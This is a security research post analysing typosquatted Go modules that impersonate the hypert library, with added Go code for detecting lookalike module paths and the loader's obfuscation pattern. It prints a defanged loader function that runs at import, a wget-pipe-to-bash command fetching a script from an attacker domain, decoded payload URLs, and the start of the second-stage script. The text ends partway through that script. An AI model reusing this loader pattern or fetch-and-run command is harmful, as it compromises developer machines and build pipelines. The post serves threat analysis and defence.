Socket researchers have uncovered an ongoing malicious campaign infiltrating the Go ecosystem with typosquatted packages that install hidden loader malware targeting Linux and macOS systems. The threat actor has published at least seven packages impersonating widely used Go libraries, including one (github.com/shallowmulti/hypert) that appears to target financial-sector developers.
These packages share repeated malicious filenames and consistent obfuscation techniques, suggesting a coordinated threat actor capable of pivoting rapidly. As of this writing, they remain accessible on the Go Module Mirror. We have requested their removal and reported the associated GitHub repositories and user accounts.
Typosquatting “Hypert”
In February 2025, the threat actor released four malicious packages on the Go Module Mirror that impersonate the legitimate github.com/areknoster/hypert library, a popular tool for testing HTTP API clients. These typosquatted clones – github.com/shallowmulti/hypert, github.com/shadowybulk/hypert, github.com/belatedplanet/hypert, and github.com/thankfulmai/hypert – embed concealed functions to enable remote code execution.
A search on the Go Module Mirror shows multiple malicious “hypert” packages (highlighted in red), all appearing above the legitimate “hypert” library (green) from github.com/areknoster/hypert.
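All four clones keep the legitimate library's final path element ("hypert") and change only the GitHub owner, so a go.mod can be checked for that shape mechanically. The following Go program is an added example, not Socket's tooling and not part of the original post: it extracts module paths from a go.mod (both the single-line and the parenthesised `require` forms), then reports any module whose last path element matches a vetted module but whose full path differs. The `vetted` allowlist, the function names, and the go.mod contents are constructed for the example; the areknoster and shallowmulti paths are the ones named in the post.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// vetted maps a module's last path element to the module path a team has
// actually reviewed. Constructed allowlist for this example.
var vetted = map[string]string{
	"hypert": "github.com/areknoster/hypert",
}

// requiredModules extracts module paths from go.mod `require` lines, in both the
// single-line form and the parenthesised block, ignoring trailing comments.
func requiredModules(gomod string) []string {
	var mods []string
	inBlock := false
	for _, raw := range strings.Split(gomod, "\n") {
		line := strings.TrimSpace(raw)
		if i := strings.Index(line, "//"); i >= 0 {
			line = strings.TrimSpace(line[:i])
		}
		fields := strings.Fields(line)
		switch {
		case line == "require (":
			inBlock = true
		case line == ")":
			inBlock = false
		case len(fields) == 3 && fields[0] == "require":
			mods = append(mods, fields[1])
		case inBlock && len(fields) == 2:
			mods = append(mods, fields[0])
		}
	}
	return mods
}

// lookalikes reports required modules whose final path element matches a vetted
// module but whose full path differs: the "same name, different owner" shape of
// the hypert clones.
func lookalikes(mods []string) []string {
	var hits []string
	for _, m := range mods {
		if legit, ok := vetted[path.Base(m)]; ok && legit != m {
			hits = append(hits, m)
		}
	}
	return hits
}

// sampleGoMod is a constructed go.mod; versions are illustrative only.
const sampleGoMod = `module example.com/app

go 1.22

require (
	github.com/areknoster/hypert v0.1.0
	github.com/shallowmulti/hypert v0.1.0 // indirect
	github.com/stretchr/testify v1.9.0
)
`

func main() {
	for _, m := range lookalikes(requiredModules(sampleGoMod)) {
		fmt.Printf("lookalike module %s (vetted path is %s)\n", m, vetted[path.Base(m)])
	}
}
```

Running this against the constructed go.mod flags github.com/shallowmulti/hypert and leaves the areknoster module alone. In a real pipeline the allowlist would be generated from the modules a team has reviewed, and a hit should fail the build rather than just print.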
Within github.com/shallowmulti/hypert, the malicious function qcJjJne() silently executes a shell command to download and run a remote script from alturastreet[.]icu. The obfuscated string in github.com/shadowybulk/hypert decodes to https://host3ar[.]com/storage/de373d0df/a31546bf, and the packages github.com/thankfulmai/hypert and github.com/belatedplanet/hypert decode to https://binghost7[.]com/storage/de373d0df/a31546bf. In the shallowmulti/hypert variant, for instance, the malicious payload runs automatically via a package-level variable initializer:
var ttDijVH = qcJjJne() // Forces qcJjJne() to run at import
Below is the deobfuscated, defanged, and annotated code snippet from the shallowmulti/hypert variant:
func qcJjJne() error {
	// Array of single-character strings used for obfuscation
	qAYW := []string{
		"d","O","n","t","|","u","d","/","d","s","a","1","0","r","a","g","e","u","-","s","&","/","t","t",
		"a","b","/","5","3","w","3","e","p","t","a","g","/"," ","b","l",".","s","c","s"," ","-","o","t",
		"4","r","/","h"," ","/","r"," ","h","t","b","i","7","e","/","t","3","6","f","a","e","i","e"," ",
		":","f"," ",
	}
	// /bin/sh and -c are used to invoke a shell command
	QJqmcouO := "/bin/sh"
	Tsfs := "-c"
	// The following line assembles the malicious command by concatenating elements of qAYW:
	// Result: "wget -O - https://alturastreet[.]icu/storage/de373d0df/a31546bf | /bin/bash &"
	fFadxxb := qAYW[29] + qAYW[15] + qAYW[70] + ... + qAYW[9] + qAYW[51] + qAYW[52] + qAYW[20]
	// Executes the malicious command in a shell, starting in the background
	exec.Command(QJqmcouO, Tsfs, fFadxxb).Start()
	return nil
}
The code uses array-based string obfuscation: the malicious command is split into an array of single-character strings and reassembled by indexing that array in a non-sequential order. This is designed to defeat basic static detection, since the complete command string never appears literally anywhere in the source.
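The snippet combines three things a static check can look for without ever reconstructing the command: a package-level variable initialised by a function call (which makes the function run during package initialisation), a string-slice literal made almost entirely of single-character elements, and exec.Command whose program argument resolves to a shell. The Go program below is an added example written for this post, not Socket's scanner and not code from the packages; it uses the standard library go/ast package to report all three. The function and type names, the element-count and percentage thresholds, and the `sample` source (which mirrors the loader's structure but whose array spells a harmless "echo obfuscated test") are all constructed for the example.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"go/types"
	"strconv"
)

type Finding struct {
	Line   int
	Reason string
}

func strLit(e ast.Expr) (string, bool) {
	if lit, ok := e.(*ast.BasicLit); ok && lit.Kind == token.STRING {
		s, err := strconv.Unquote(lit.Value)
		return s, err == nil
	}
	return "", false
}

// scanSource parses one Go file and reports three indicators of the loader pattern:
// import-time execution, a single-character string array, and a shell spawned via exec.Command.
func scanSource(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	var findings []Finding
	add := func(n ast.Node, r string) { findings = append(findings, Finding{fset.Position(n.Pos()).Line, r}) }
	for _, decl := range f.Decls { // 1. `var x = f()` at package scope runs f during package initialisation
		if gd, ok := decl.(*ast.GenDecl); ok && gd.Tok == token.VAR {
			for _, spec := range gd.Specs {
				for _, v := range spec.(*ast.ValueSpec).Values {
					if _, ok := v.(*ast.CallExpr); ok {
						add(v, "package-level var initialised by a call, which runs at import time")
					}
				}
			}
		}
	}
	strVars := map[string]string{} // `name := "literal"` seen so far, in source order (simplifying assumption)
	ast.Inspect(f, func(n ast.Node) bool {
		switch x := n.(type) {
		case *ast.AssignStmt:
			for i := 0; i < len(x.Lhs) && len(x.Lhs) == len(x.Rhs); i++ {
				if id, ok := x.Lhs[i].(*ast.Ident); ok {
					if s, ok := strLit(x.Rhs[i]); ok {
						strVars[id.Name] = s
					}
				}
			}
		case *ast.CompositeLit: // 2. []string{"w","g","e","t",...}: count single-character elements
			single := 0
			for _, e := range x.Elts {
				if s, ok := strLit(e); ok && len(s) == 1 {
					single++
				}
			}
			if single >= 16 && single*5 >= len(x.Elts)*4 { // thresholds are assumptions
				add(x, fmt.Sprintf("array literal of %d single-character strings (string-splitting obfuscation)", single))
			}
		case *ast.CallExpr: // 3. exec.Command(prog, ...) with prog a literal or a recorded local var
			if types.ExprString(x.Fun) != "exec.Command" || len(x.Args) == 0 {
				return true
			}
			prog, ok := strLit(x.Args[0])
			if id, isID := x.Args[0].(*ast.Ident); isID {
				prog, ok = strVars[id.Name]
			}
			if ok && (prog == "/bin/sh" || prog == "/bin/bash" || prog == "sh" || prog == "bash") {
				add(x, "exec.Command runs a shell ("+prog+")")
			}
		}
		return true
	})
	return findings, nil
}

// sample is a constructed source with the loader's structure; its array spells "echo obfuscated test".
const sample = `package hypert
import "os/exec"
var ttDijVH = qcJjJne() // forces the call to run at import
func qcJjJne() error {
	q := []string{"e", "c", "h", "o", " ", "o", "b", "f", "u", "s", "c", "a", "t", "e", "d", " ", "t", "e", "s", "t"}
	sh, flag := "/bin/sh", "-c"
	exec.Command(sh, flag, q[0]+q[1]+q[2]+q[3]+q[4]+q[5]).Start()
	return nil
}
`

func main() {
	findings, _ := scanSource("sample.go", sample)
	for _, f := range findings {
		fmt.Printf("sample.go:%d: %s\n", f.Line, f.Reason)
	}
}
```

Each indicator is noisy on its own (test helpers build string tables, tooling wraps shells legitimately), so the useful signal is the co-occurrence within one file, especially in a dependency pulled in by a name that differs from the vetted module only in its owner. The local-variable resolution is deliberately simple: it tracks `name := "literal"` in source order, which is enough for the loader shown above but not for values built at runtime.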
Socket AI Scanner’s analysis, including contextual details about the malicious github.com/shallowmulti/hypert package.
Malicious Domain Typosquatting Tactics
The malicious domain alturastreet[.]icu bears a superficial resemblance to alturacu.com, the legitimate online banking portal for Altura Credit Union. While alturacu.com clearly reflects its credit union affiliation, alturastreet[.]icu adopts an unrelated word, “street”, paired with a less conventional top-level domain (.icu). This discrepancy suggests a calculated effort to mislead or confuse potential victims. The threat actor may be leveraging brand recognition around “Altura” for typosquatting or spearphishing campaigns specifically targeting Altura Credit Union users. The deliberate domain choice, unconventional TLD, and clear tie-in to malicious payloads illustrate the threat actor’s intent to exploit a reputable financial brand name, posing a notable security risk.
The search engine DuckDuckGo interprets “alturastreet” as related to “altura”, thus returning matches for alturacu.com and official Altura Credit Union pages.
Malicious Script Installs ELF File
The malicious code initiates a script download that ultimately installs the f0eee999 ELF file. The command:
wget -O - https://alturastreet[.]icu/storage/de373d0df/a31546bf | /bin/bash &
retrieves a remote script from alturastreet[.]icu, pipes it directly into bash, and executes it in the background. As soon as a developer or CI/CD environment imports the package, the payload runs silently.
#!/bin/bash
cd ~
# 1. Moves into the current user's home directory
if [[ "$OSTYPE" == "linux-gnu"* ]];